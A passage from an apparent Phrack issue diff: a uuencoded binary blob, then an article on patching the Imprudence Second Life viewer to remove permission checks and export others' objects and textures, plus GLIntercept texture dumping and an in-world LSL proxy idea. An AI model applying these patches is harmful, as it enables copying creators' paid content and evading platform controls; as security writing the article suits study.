+MF5A&F5A<0B!3'3ESFBE::;B50R+7_/WQ)=$0RR=;GC^_EIEMW->SMQ>73!+&
+MU=:A3V7N]=#>TADB"Y^11VF9I<`/=7=OA)!<`CRN2LI&]'0HU8O80243ZA@*
+MTWX1!?&A4;M+X]#)UPUU8O7.(:VTO=*1Z"W8P?O<G(Z/A8SCL6B_SK5.9W?$
+M?L!:0DQ%ZZKT0-R$H`=(/")PZKGJ+7Q>)H'>;MH_O,^4(')Y?8!/,PP.64XG
+MLH(C-HRZ%-JE8FS+!FAN!K#HZBX!X59+/6*M+M21'-B(HHPH/'84KQ$_^7*`
+M6<7P(-V:R:`0(-:U(E+I2:!NK&'*[0A)@&`6X;$AQK'T;1?"U\<*Q+^R;_4]
+MH*&=P8B]@W&8R`IC(1\321\%^#8+BXQG:_DD1I7CI9AGO9?'/CO`"14MXAH;
+M==Q[R,&]+QR[`&??[KZHXDY)$"IPTUR3:;Z1CM8EUKDDL2YAQ0U"(PO\HOMW
+MNDW"PFA\\H,*6A7:YOAV#6R-7/>1#'%H3,/98Y6SYS3OZ+OR78[BN[S95GJ)
+M<)?LX*>CE]ML-#3G+^332:4:.9*YXFO&Y2,]&@9G`'D&8,XIIT@E2O@(YU>1
+M)7B=7TA!JKQ;[0/+ZDF0E050#=B0G`6=&.R_V0')!:M.*"K5QD84L4R?;2`0
+M:*RD"^ZQ$Y6ZEDE0]$%U&ARI@E,,QI84E*B'<-K_P6-]2YIU*7+\6SOJJS-?
+M]35ZE&=`7M8M.$KH<<DR@W]#<5/U_ML(PV^.X_[ZG\'^<&_C_??3YT__4__S
+M1WP>>/]MA&*$%3LIN`:8U#/6-R&E,I?9RBS1M0D+>,'EU8GN]OYGE`+YUZ%\
+MX9SD^FFS7V9!F&$PFNI1W_%<5(D<5RV_:C%H$BJ?5D^C-S-%33A>]55%%A3Q
+M4L!,I0,U]JJ3",M\U-,#"$ATL;B\ZL*'V]*MS8L`;%U5*KZC,B"4$9"/<U0Z
+MEIZU@V\.>P2B7PAD<A\V+02/LO]L=V]W..CEM-B>(:LG*>K1>=V32^ZA"PPX
+M^Q(A&D>5:YKA`YG&TUG&[F2#MS')S*$"=HD,WZHK?&@O&R/PK*L_"M./WA2G
+MVI3(MY%Z9O,E0=%^9$5(@`(7'8),%]4KFF3%A[/YA@'[ZQ1C*F%SE*IL=2KX
+MS3'RSE\)F*=@;9*7@MS5M@`36JT5U[A472A5&_8E#*)6*E43AK\JA&XH0#/A
+MZ;25QZL:6JG1"AV(,@TFK3:>-VAJAB<UJ"OEFF3%H2J7HY`%\S^U&,&6_JMR
+MJJCJ3=Y4T>T3>40%9?L1#27F9$J9@SLLO0Z"JIU@!6>+QDGV$*R\`D;U4:AY
+M4[P\IN(+K$[!!MRXE2Q<*5/0@/H`V:)&3"H$N&E!,D62VMM&>X!QH<O2(/2Q
+M6@@LG9?R+!=3^0A;OC"5WW.L:U'-MBK5[E&^LGI3*C^1B*^+A7S4_R`$.=CN
+M-D5YE@1K*D%IM(*WYU?Y+7`+0TR@]/%.IH>GA[TI[`I0M3`S35*6(>,5`UK:
+M%#70\32-0I_^AQ[]V]YJM>H1VC*#!:"%#+8@_VB>M!$:CW+T<L&;VKU!Z<?<
+M^0BR]4&(=#J+>/QA*H5Q/*R*^`U?FA(,4HK@MNB^?.,JG],ADH8`.CCIJ@%*
+MWD%)([8AJVV&;7LD)C$BX(KF;_$<"?TE2$,2-$1U&U%-O/J1@$OZV!)GT"WS
+M%@IW%`,GT'B,C+3S+M6X=V@T6]=JR*=5A;@M9!LWRDD&Q6NR_$>$`H8/PF&N
+M<NMS?,Q/OY98^T.G+!KRZO^.H3C"PTS65S5!*AN#F]>X/JX^1/*4KA%(L+;Q
+MY1_M'%U/VS#PN?D55O8P1RT)+71(E#QL%8('MDECDR:Q*D)MJD:D*6JI!!K[
+M[[L[V[&=AI8B!FCR/:#0V.?SV<Y]^D*Z;0H(5G<8;!,+0\QVVG6W^B2)%$>W
+M(]8VX)!9H:]6/X70]S%\O8SFY%%^`%]*MV+78ONU6T%7(_V,J=7CNC`0')9#
+M#^QI2F%,Z%8ROU>C@^LB@EM%`>F/I7;4!/2,(--J!(M$>"#))(V!KT3;0'V]
+M`^-W>@SVIG'&U@7#[`A/;6!-Q-V\#,O=H.!*$OJT)@FR+DGD%_353%L'CP"R
+M_XW4C'\QQO;U_SH?NJ[^WXM`=?U-+^ISC;'!_]/9.^A4UK_;/N@Z_\]+0!19
+MCG,SUB$#;F4=/VCZ!.\-]=K&?;.2^E63WX4D![\]H4O,V3#%:Z0Q*^NX@6%R
+MG%/\;O'IKH^&*=Z.Y?X-ZH-^T-.B%[0TCBBR>+?'LB/"%`J='OYO-F&4!K['
+MCGU0*%"EQS87V2!4O\$P/<]K9&,N8R>+C\4=5V\EM8A(T8MA%@,/:,F`X@OZ
+M9?1C3S1?W\A\%.&9/ACO(PX#!!)!%)TIC[PN8G6(P0-2YT2Z%,6!+JDB"*$1
+MV2>`)32HV(K!U`T#_+OP+,R^/UZC7+%B.4T>CQ2-3$3JB0E]2^7M''((T(JQ
+M\ZOLVJAFLM\RM'EJ-LN7TX(IR[6R]ONX]B5-U?4O7U06'4WBG;V>G)PD#N,0
+M,S@C&<9XU!:6M22))V/&N?H]5)$'-28J4&T6L/M[QM5VIP(S/@.3N@%:5XC]
+MQG.\\)#/A`$;3N;I.*9#TO2323BYF?J"*K3AMNCU#N\AJ&%['LP)F4V*\0UE
+MNH^%0:6VN7"2R#IJNM;9<)(.KT)]D*NGHB5:`&MKCB`[DOTKBP"G"_N&8!>D
+MMU_AJ&$C3.#`O."=MCI><TVNL?$\XQ5=DH3)O?:7]VU`5?[;T>_G&6.3_.]V
+MNE7Y#\]._K\$@'BVE_SA?)(WK`]@B%[J`V(VRA/`\0WYO.BA/=!2Y'_[4)^D
+M2IH;;BZ=R2-3'$1<'V\',#Z:I0N\2985PWPY2E6`*-`LKS"S3,EN&7@,/<SR
+MOX!T)#<W2'6NK@(@V;KD6I/YD>&<5'J9<([/%G8W/6"+^6:O%DNIJ*?M6`P"
+M8@OPY<<<]B[H$K!\:H8HI$!S`MX!)>B9BZ)S]$9=JC*=7&PK<A8%E`M(3-2,
+MT3020:(Y^JP-;M`(J.#0WH#)QC@/;(3S+)M1Q"_&NDWLY^>S4_A/E30R^!'.
+MKM."^T@$3)C&1!&G=C,U@?DK#Y-PROM]PZV/^3@;G=[F$JS!)XZ`WY)3E$=B
+M8]]"9+(A)53768QF=BI&7*`4JV>S&S>2O=]NI_FIY-XRSR4OC!\?9*EL([C*
+M_)/CDJNBA$*E&1%&8Z@W4I=0#50JSG?04)QJX<"!`P<.'#APX,"!`P<.'#AP
+2X,"!`P<.7A_^`BMJX<X`>```
+`
+end
+
+
+|=[ 0x05 ]=---=[ Hacking the Second Life Viewer For Fun & Profit - Eva ]-=|
+
+|=-----------------------------------------------------------------------=|
+|=------------------------=[ 01110010011000010110 ]=---------------------=|
+|=------------------------=[ 01100110010101101110 ]=---------------------=|
+|=------------------------=[ 10010110111001110011 ]=---------------------=|
+|=------------------------=[ 01110011011001010111 ]=---------------------=|
+|=-----------------------------------------------------------------------=|
+
+Index
+
+------[ N. Preamble
+------[ I. Part I - Objects
+------[ II. Part II - Textures
+            II. i. Textures - GLIntercept
+------[ III. Postamble
+------[ B. Bibliography
+------[ A. Appendix
+
+|=-----------------------------------------------------------------------=|
+
+------[ N. Preamble
+
+Second Life [1] is a virtual universe created by Linden Labs [2] which
+allows custom content to be created by uploading different file formats. It
+secures that content with a permission mask "Modify / Copy / Transfer",
+which allows creators to protect their objects from being modified, copied
+or transferred from avatar to avatar. The standard viewer at the time of
+this writing is 2.x but the 1.x old codebase is still around and it is
+still the most wide-spread one. Then, we have third party viewers, and
+those are viewers forked off the 1.x codebase and then "extended" to modify
+the UI and add features for convenience.
+
+Second Life works on the principle of separately isolated servers called
+SIMs (from, simulator, now recently renamed to "Regions") which are
+interconnected to form grids. The reasoning is that, if one SIM goes down,
+it will become unavailable but it will not take down the entire grid. A
+grid is just a collection of individual SIMs (regions) bunched together.
+
+Avatars are players that connect to the grid using a viewer and navigate
+the SIMs by "teleporting" from one SIM to the other. Technically, that
+just means that the viewer is instructed to connect to the address of a
+different SIM.
+
+A viewer is really just a Linden version of a web browser (literally) which
+relies on loads of Open Source software to run. It renders the textures
+around you by transferring them from an asset server. The asset server is
+just a container that stores all the content users upload onto Second Life.
+Whenever you connect to a SIM, all the content around you gets transferred
+to your viewer, just like surfing a website.
+
+There are a few content types in Second Life that can be uploaded by users:
+
+  1.) Images
+  2.) Sounds
+  3.) Animations
+
+Whenever I talk about "textures", I am talking about the images that users
+have uploaded onto Second Life. In order to upload one of them onto Second
+Life, you have to pay 10 Linden dollars. Linden maintains a currency
+exchange from Linden dollars to real dollars.
+
+At any point, depending on the build permission of the SIM you are
+currently on, you are able to create objects. Those are just basic
+geometric shapes called primitives, (or prims for short) such as cubes,
+spheres, prisms, etc... After you created a primitive, you can decorate
+it with images or use the Linden Scripting Language LSL [3] to trigger
+the sounds you uploaded or animate avatars like yourself. There is a lot
+to say about LSL, but it exceeds the scope of the article. You can also
+link several such primitives together to form a link set which, in turn,
+is called an object. (LISP fans dig in, Second Life is all about lists -
+everything is a list.)
+
+Coming back to avatars, your avatar has so called attachment-points which
+allow you to attach such an object to yourself. Users create content, such
+as hats, skirts, and so on and they sell them to you and you attach them to
+these attachment points.
+
+In addition to that, there are such things called wearables. Those are
+different from attachments because they are not made up of objects but they
+are rather simple textures that you apply to yourself. Those do not have
+any geometric properties in-world and function on the principle of layers,
+hiding the layer underneath. Finally, you have body parts which are also
+just textures. For example, eyes, your skin.
+
+The wearable layers get superimposed (baked) on you. For example, if you
+wear a skin and a T-shirt, the T-shirt texture will hide part of the skin
+texture underneath it.
+
+We are going to take a standard viewer: we will use the Imprudence [4]
+viewer, the current git version of which has such an export feature and we
+are going to modify it so it will allow exports of any in-world object.
+Later on, the usage of GLIntercept [7] will be mentioned since it can be
+used to export the wearables and the body parts mentioned which are just
+textures.
+
+Why does this work? There are a number of restrictions which are enforced
+by the server, and a number of actions that the server cannot control. For
+example, every action you trigger in Second Life usually gets a permission
+check with the SIM you are triggering the action on. Your viewer interprets
+the response from the SIM and if it is given the green light, your viewer
+goes ahead and performs the action you requested.
+
+Say, for example, that the viewer does not care whether the SIM approves it
+or not and just goes ahead and does it anyway. Will that work? It depends
+whether the SIM checks again. Some viewers have a feature called "Enable
+always fly.", which allows you to fly around in no-fly zones which is an
+instance of the problem. The SIM hints the viewer that it is a no-fly zone,
+however the viewer ignores it and allows you to fly regardless.
+
+Every avatar is independent in this aspect and protected from other avatars
+by a liability dumping prompt. Whenever an avatar wants to interact with
+you, you are prompted to allow them permission to do so. However, the
+graphics are always displayed and your viewer renders other avatars without
+any checks. One annoyance, for example, is to spam particles generated by
+LSL. Given a sufficiently slow computer, your viewer will end up
+overwhelmed and crash eventually. These days, good luck with that...
+
+But how do we export stuff we do not own, doesn't the server check for
+permissions? Not really, we are not going to "take" the object in the sense
+of violating the Second Life permissions. We are going to scan the object
+and note down all the parameters that the viewer can see. We are then going
+to store that in an XML file along with the textures as well. This will be
+done automatically using Imprudence's "Export..." feature.
+
+Whenever you upload any of the content types mentioned in the previous
+chapter, the Linden asset server generates an asset ID which is basically
+an UUID that references the content you uploaded. The asset server
+(conveniently for us) does not carry out any checks to see whether there is
+a link between an object referencing that UUID and the original uploader.
+Spelled out, if you manage to grab the UUID of an asset, you can reference
+it from an object you create.
+
+For example, if a user has uploaded a texture and I manage to grab the UUID
+of the texture generated by the asset server, then I can use LSL to display
+it on the surface of a primitive. It is basically just security through
+obscurity (and bugs)...
+
+------[ I. Part I - Objects
+
+The "Export..." feature on the viewers we attack is not an official feature
+but rather a feature implemented by the developers of the viewers
+themselves. That generally means that the viewer only implements certain
+checks at the client level without them being enforced by the server. The
+"Export..." feature is just a dumb feature which scans the object's
+measurements, grabs the textures and dumps the data to an XML file and
+stores image files separately.
+
+Since it is a client-side check, we can go ahead and download Imprudence
+(the same approach would work on the Phoenix [5] client too) and knock out
+all these viewer checks.
+
+After you cloned the Imprudence viewer from the git repo, the first file we
+edit is at linden/indra/newview/primbackup.cpp.
+
+Along the very fist lines there is a routine that sets the default
+textures, I do not think this is needed to make our "Export..." work, but
+it is a good introduction to what is going on in this article:
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+void setDefaultTextures()
+{
+    if (!gHippoGridManager->getConnectedGrid()->isSecondLife())
+    {
+        // When not in SL (no texture perm check needed), we can
+        // get these defaults from the user settings...
+        LL_TEXTURE_PLYWOOD =
+            LLUUID(gSavedSettings.getString("DefaultObjectTexture"));
+        LL_TEXTURE_BLANK =
+            LLUUID(gSavedSettings.getString("UIImgWhiteUUID"));
+        if (gSavedSettings.controlExists("UIImgInvisibleUUID"))
+        {
+            // This control only exists in the
+            // AllowInvisibleTextureInPicker patch
+            LL_TEXTURE_INVISIBLE =
+                LLUUID(gSavedSettings.getString("UIImgInvisibleUUID"));
+        }
+    }
+}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+The viewer uses a method isSecondLife() to check if it is currently on the
+official grid. Depending on the outcome of this method, the viewer
+internally takes decisions on whether certain things are allowed so that
+the viewer will conform to the Linden third-party viewer (TPV) policy [6].
+The TPV policy is a set of rules that the creator of a viewer has to
+respect so that the viewer will be granted access to the Second Life grid
+(ye shall not steal, ye shall not spam, etc...).
+
+However, these checks are client-side only. They are used internally within
+the viewer and they have nothing to do with the Linden servers. What we do,
+is knock them out so that the viewer does not perform the check to see if
+it is on the official grid. In this particular case, we can knock out the
+check easily by eliminating the if-clause, like so:
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+void setDefaultTextures()
+{
+    //if (!gHippoGridManager->getConnectedGrid()->isSecondLife())
+    //{
+          // When not in SL (no texture perm check needed), we can
+          // get these defaults from the user settings...
+          LL_TEXTURE_PLYWOOD =
+              LLUUID(gSavedSettings.getString("DefaultObjectTexture"));
+          LL_TEXTURE_BLANK =
+              LLUUID(gSavedSettings.getString("UIImgWhiteUUID"));
+          if (gSavedSettings.controlExists("UIImgInvisibleUUID"))
+          {
+              // This control only exists in the
+              // AllowInvisibleTextureInPicker patch
+              LL_TEXTURE_INVISIBLE =
+                  LLUUID(gSavedSettings.getString("UIImgInvisibleUUID"));
+          }
+    //}
+}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+Without this check, the viewer assumes that we are on any grid but the
+Second Life grid. You probably can notice that these checks are completely
+boilerplate.
+
+Let us move on to the next stop. Somewhere in
+linden/indra/newview/primbackup.cpp you will find the following:
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+bool PrimBackup::validatePerms(const LLPermissions *item_permissions)
+{
+    if(gHippoGridManager->getConnectedGrid()->isSecondLife())
+    {
+        // In Second Life, you must be the creator to be permitted to
+        // export the asset.
+        return (gAgent.getID() == item_permissions->getOwner() &&
+            gAgent.getID() == item_permissions->getCreator() &&
+            (PERM_ITEM_UNRESTRICTED & item_permissions->getMaskOwner())
+            == PERM_ITEM_UNRESTRICTED);
+    }
+    else
+    {
+        // Out of Second Life, simply check that you're the owner and the
+        // asset is full perms.
+        return (gAgent.getID() == item_permissions->getOwner() &&
+            (item_permissions->getMaskOwner() & PERM_ITEM_UNRESTRICTED)
+            == PERM_ITEM_UNRESTRICTED);
+    }
+}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+This checks to see if you have full permissions, and are the owner and the
+creator of the object you want to export. This only applies to the Second
+Life grid. If you are not on the Second Life grid, then it checks to see if
+you are the owner and have full permissions. We will not bother and will
+modify it to always return that all our permissions are in order:
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+bool PrimBackup::validatePerms(const LLPermissions *item_permissions)
+{
+    return true;
+}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+The next stop is in the same file, at the following method:
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+LLUUID PrimBackup::validateTextureID(LLUUID asset_id)
+{
+    if (!gHippoGridManager->getConnectedGrid()->isSecondLife())
+    {
+        // If we are not in Second Life, don't bother
+        return asset_id;
+    }
+
+    LLUUID texture = LL_TEXTURE_PLYWOOD;
+    if (asset_id == texture ||
+            asset_id == LL_TEXTURE_BLANK ||
+            asset_id == LL_TEXTURE_INVISIBLE ||
+            asset_id == LL_TEXTURE_TRANSPARENT ||
+            asset_id == LL_TEXTURE_MEDIA)
+    {
+        // Allow to export a grid's default textures
+        return asset_id;
+    }
+    LLViewerInventoryCategory::cat_array_t cats;
+
+// yadda, yadda, yadda, blah, blah, blah...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+There is a complete explanation of what this does in the comments. This
+checks to see whether you are in Second Life, and if you are, it goes
+through a series of inefficient and poorly coded checks to ensure that you
+are indeed the creator of the texture by testing whether the texture is in
+your inventory. We eliminate those checks and make it return the asset ID
+directly:
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+LLUUID PrimBackup::validateTextureID(LLUUID asset_id)
+{
+    return asset_id;
+}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+Once you compile the modified viewer, you will be able to export any
+object, along with its textures that you can see in-world. The next step is
+to modify the skin (i.e. Imprudence's user interface) so that you may 
+export attachments from the GUI.
+
+First, let us enable the pie "Export..." button. I will assume that you use
+the default skin. The next stop is at
+linden/indra/newview/skins/default/xui/en-us/menu_pie_attachment.xml. You
+will need to add:
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+    <menu_item_call enabled="true" label="Export" mouse_opaque="true"
+        name="Object Export">
+        <on_click function="Object.Export" />
+        <on_enable function="Object.EnableExport" />
+    </menu_item_call>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+Now, we need to enable it for any avatar at
+linden/indra/newview/skins/default/xui/en-us/menu_pie_avatar.xml. You will
+need to add:
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+    <menu_item_call enabled="true" label="Export" mouse_opaque="true"
+        name="Object Export">
+        <on_click function="Object.Export" />
+        <on_enable function="Object.EnableExport" />
+    </menu_item_call>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+After that, we must add them so the viewer picks up the skin options. We
+open up linden/indra/newview/llviewermenu.cpp and add in the avatar pie
+menu section:
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+// Avatar pie menu
+...
+    addMenu(new LLObjectExport(), "Avatar.Export");
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+We do the same for the attachments section:
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+// Attachment pie menu
+...
+
+    addMenu(new LLObjectEnableExport(), "Attachment.EnableExport");
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+Now we are set. However, the viewer performs a check in "EnableExport" in
+linden/indra/newview/llviewermenu.cpp which we need to knock out:
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+class LLObjectEnableExport : public view_listener_t
+{
+    bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
+    {
+        LLControlVariable* control =
+            gMenuHolder->findControl(userdata["control"].asString());
+
+        LLViewerObject* object =
+        LLSelectMgr::getInstance()->getSelection()->getPrimaryObject();
+
+        if((object != NULL) &&
+            (find_avatar_from_object(object) == NULL))
+        {
+
+// yadda, yadda, yadda, blah, blah, blah...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+The code initially checks whether the object exists, if it is not worn by
+an avatar, and then applies permission validations to all the children
+(links) of the object. If the object exists, if it is not worn by an avatar
+and all the permissions for all child objects are correct, then the viewer
+enables the "Export..." control. Since we do not care either way, we enable
+the control regardless of any checks.
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+class LLObjectEnableExport : public view_listener_t
+{
+    bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
+    {
+        LLControlVariable* control =
+            gMenuHolder->findControl(userdata["control"].asString());
+
+        LLViewerObject* object =
+        LLSelectMgr::getInstance()->getSelection()->getPrimaryObject();
+
+        if(object != NULL)
+        {
+            control->setValue(true);
+            return true;
+
+// yadda, yadda, yadda, blah, blah, blah...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+I have left the NULL check for the object since if you happen to mis-click
+and select something other than an object, then the "Export..." pie menu
+will be enabled and your viewer will crash. More precisely, if you instruct
+the viewer to export something using the object export feature, and it is
+not an object, the viewer will crash since there are no checks performed
+after this step.
+
+Further on in linden/indra/newview/llviewermenu.cpp there is another test
+to see whether the object you want to export is attached to an avatar. In
+that case, the viewer considers it an attachment and disallows exporting.
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+class LLObjectExport : public view_listener_t
+{
+    bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
+    {
+        LLViewerObject* object =
+        LLSelectMgr::getInstance()->getSelection()->getPrimaryObject();
+        if (!object) return true;
+
+        LLVOAvatar* avatar = find_avatar_from_object(object);
+
+        if (!avatar)
+        {
+            PrimBackup::getInstance()->exportObject();
+        }
+
+        return true;
+    }
+};
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+Again, we proceed the same way and knock out that check which will allow
+us to export objects worn by any avatar:
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+class LLObjectExport : public view_listener_t
+{
+    bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
+    {
+        PrimBackup::getInstance()->exportObject();
+
+        return true;
+    }
+};
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+These changes will be sufficient in order to transform your viewer into an
+undetectable tool that will allow you to export any object along with the
+associated textures.
+
+There are indeed easier ways, for example toggling God mode from the
+source code and bypassing most checks. However, that will be discussed
+in the upcoming full article, along with explanations on what Linden are
+able to detect and wearable exports.
+
+Alternatively, and getting closer to a "bot", there are ways to program
+a fully non-interactive client [11] that will export everything it sees
+automatically. This will also be covered in the upcoming article since it
+takes a little more than hacks. The principle still holds: "who controls
+an asset UUID, has at least permission to grab the asset off the asset
+server".
+
+------[ II. Part II - Textures
+
+In the first part we have talked about exporting objects. There is more fun
+you can have with the viewer too, for example, grabbing any texture UUID,
+or dumping your skin and clothes textures.
+
+What can we do about clothes? If you have an outfit you would like to grab,
+with the previous method you will only be able to export primitives without
+the wearable clothes. How about backing up your skin?
+
+The 1.x branch of the Linden viewer has an option, disabled by default and
+only accessible to grid Gods, which will allow you to grab baked textures.
+Grid Gods are essentially Game Masters and in the case of Second Life, they
+consist of the "Linden"s, which are Linden Labs employees represented
+in-world by avatars, conventionally having "Linden" as their avatar's last
+name.
+
+We open up linden/indra/newview/llvoavatar.cpp and we find:
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+BOOL LLVOAvatar::canGrabLocalTexture(ETextureIndex index)
+{
+    // Check if the texture hasn't been baked yet.
+    if (!isTextureDefined(index))
+    {
+        lldebugs << "getTEImage( " << (U32) index << " )->getID()
+            == IMG_DEFAULT_AVATAR" << llendl;
+        return FALSE;
+    }
+
+    if (gAgent.isGodlike() && !gAgent.getAdminOverride())
+        return TRUE;
+
+// yadda, yadda, yadda, blah, blah, blah...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+Aha, so it seems that grid Gods are permitted to grab textures. That is
+fine, so can we:
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+BOOL LLVOAvatar::canGrabLocalTexture(ETextureIndex index)
+{
+    // Check if the texture hasn't been baked yet.
+    if (!isTextureDefined(index))
+    {
+        lldebugs << "getTEImage( " << (U32) index << " )->getID()
+            == IMG_DEFAULT_AVATAR" << llendl;
+        return FALSE;
+    }
+
+    return TRUE;
+
+    if (gAgent.isGodlike() && !gAgent.getAdminOverride())
+        return TRUE;
+
+// yadda, yadda, yadda, blah, blah, blah...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+But that is not sufficient. The 1.x viewer code has an error (perhaps
+intentional) which will crash the viewer when you try to grab the lower
+part of your avatar. In the original code at
+linden/indra/newview/llviewermenu.cpp, we have:
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+        else if ("lower" == texture_type)
+        {
+            handle_grab_texture( (void*)TEX_SKIRT_BAKED );
+        }
+        else if ("skirt" == texture_type)
+        {
+            handle_grab_texture( (void*)TEX_SKIRT_BAKED );
+        }
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+Which must be changed to:
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+        else if ("lower" == texture_type)
+        {
+            handle_grab_texture( (void*)TEX_LOWER_BAKED );
+        }
+        else if ("skirt" == texture_type)
+        {
+            handle_grab_texture( (void*)TEX_SKIRT_BAKED );
+        }
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+You are free to recompile and go to the menu and dump the textures on you,
+including your skin. To grab your skin, you can undress your avatar and
+grab the textures. You can then export them using the method from Part I.
+For clothes, you would do the same by clothing your avatar, grabbing the
+relevant textures and then exporting them using the method from Part I.
+
+You might notice that the texture that will be dumped to your inventory is
+temporary. That is, it is not an asset and registered with the asset
+server. Make sure you save the texture, or, if you want to save a bunch of
+them, consider reading the first part of the article and place the textures
+on a primitive and export the entire primitive.
+
+Since the textures are baked, they represent an overlay of your skin and
+your clothes. If you want to extract just the clothes, you might need to
+edit the grabbed textures in a graphics editing program to cut out the skin
+parts. However, it might be possible to use a transparent texture for your
+skin when you grab the textures. In that case, you will not have to edit
+the clothes at all.
+
+------[ II. Part II - Textures
+            II. i. Textures - GLIntercept
+
+The GLIntercept method involves grabbing a copy of GLIntercept and
+replacing the .dll file with the GLIntercept one. By doing that, when you
+run the Second Life viewer, all the textures will be stored to your hard
+drive in the images directory. It is a resource consuming procedure because
+any texture that your viewer sees is saved to your hard-drive.
+
+Therefore, if your only interest is to allot a collection of textures, then
+get GLIntercept and, after installing it, replace the opengl .dll from your
+viewer directory with the one from GLIntercept. If you cannot find the
+viewer's opengl .dll, then just copy it as a new file because the viewer
+will pick it up. I recommend setting your graphics all the way to low and
+taking it easy because in the background, the GLIntercept .dll will create
+an images directory and dump all the possible textures, including the
+textures belonging to the UI.
+
+There is a lot of fuss going on about GLIntercept. Some strange people say
+it does not work anymore and some funny people come up with ideas like
+encrypting the textures. The principle that GLIntercept works on is trivial
+to the point of making the whole fuss meaningless. GLIntercept, when used
+in conjunction with the viewer is an extra layer between your viewer and
+opengl. Anything that your graphics card renders can be grabbed - together
+with other similar software [8], the same effect described in this article,
+however it would require you to convert the structures to the Second Life
+format. The usage of GLIntercept is not restricted to Second Life, you can
+go ahead and grab anything you like from any program that uses opengl. It
+literally puts a dent (crater?) into content stealing, the important phrase
+being: "anything that your graphics card renders, can be grabbed".
+
+------[ IV. Postamble
+
+Second Life is a vanity driven virtual universe which is plagued by the
+most horrible muppets that fake anonymity could spawn. The Lindens maintain
+full control and all the content you upload automatically switches
+ownership to Linden Labs via the Terms of Service which make you renounce
+your copyright. Not only that, but there are plenty of rumours you are
+tracked and they have a dodgy "age-verification" system in place which
+forces you to send your ID card to be checked by "a third party". Under
+these circumstances, it is of course questionable what they do with that
+data and whether they link your in-world activities to your identity.
+
+There is more that could be potentially done, the viewers are so frail and
+incredibly poorly coded from all perspectives and certainly not the quality
+you would expect from an institution that makes billions of shineys. There
+have been exploits before such as Charlie Miller's Quicktime exploit [9]
+which was able to gain full control of your machine (patched now) and
+Michael Thumann's excellent presentation which goes over many concepts of
+Second Life as well as how they can be abused [10].
+
+One of the further possibilities I have been looking into (closely related
+to Michael Thumann's presentation) is to use LSL and create an in-world
+proxy that will enable your browser to connect to a primitive in-world and
+bounce your traffic. There is a limitation imposed on the amount of
+information an LSL script can retrieve off the web, however I am still
+looking into way to circumvent that. Essentially the idea would be to use
+the Linden Labs servers as a proxy to carry out all the surfing. At the
+current time of writing this article, I do have a working LSL
+implementation (you can see an example of that in [A. 1]) that can grab 2kb
+off any website (this is a limitation imposed by the LSL function
+llHTTPRequest()). Additionally, a PHP page could be created that rewrites
+the content sent back by the LSL script and so that the links send the
+requests back through the script in Second Life.
+
+Not only IPs, but headers, timezone, DNS requests and everything else gets
+spoofed that way.
+
+The possibilities are limitless and I have seen viewers emerge that rely on
+this concept, such as CryoLife or NeilLife. However, the identification
+strings sent by the few versions lying around the net have been tagged and
+any user connecting with them would be banned. If you want to amuse
+yourself further, you may want to have a look at:
+
+http://wiki.secondlife.com/wiki/User:Crone_Dryke
+
+Dedicated to CV. Many thanks to the Phrack Staff for their help and their
+interest in the article.
+
+Thank you for your time!
+
+------[ B. Bibliography
+
+[1] The Second Life website,
+    http://secondlife.com/
+[2] Linden Labs official website,
+    http://lindenlab.com/
+[3] Linden Scripting Language LSL Wiki,
+    http://wiki.secondlife.com/wiki/LSL_Portal
+[4] Imprudence Viewer downloads,
+    http://wiki.kokuaviewer.org/wiki/Imprudence:Downloads
+[5] The Phoenix Viewer,
+    http://www.phoenixviewer.com/
+[6] The third-party viewer policy,
+    http://secondlife.com/corporate/tpv.php
+[7] GLIntercept,
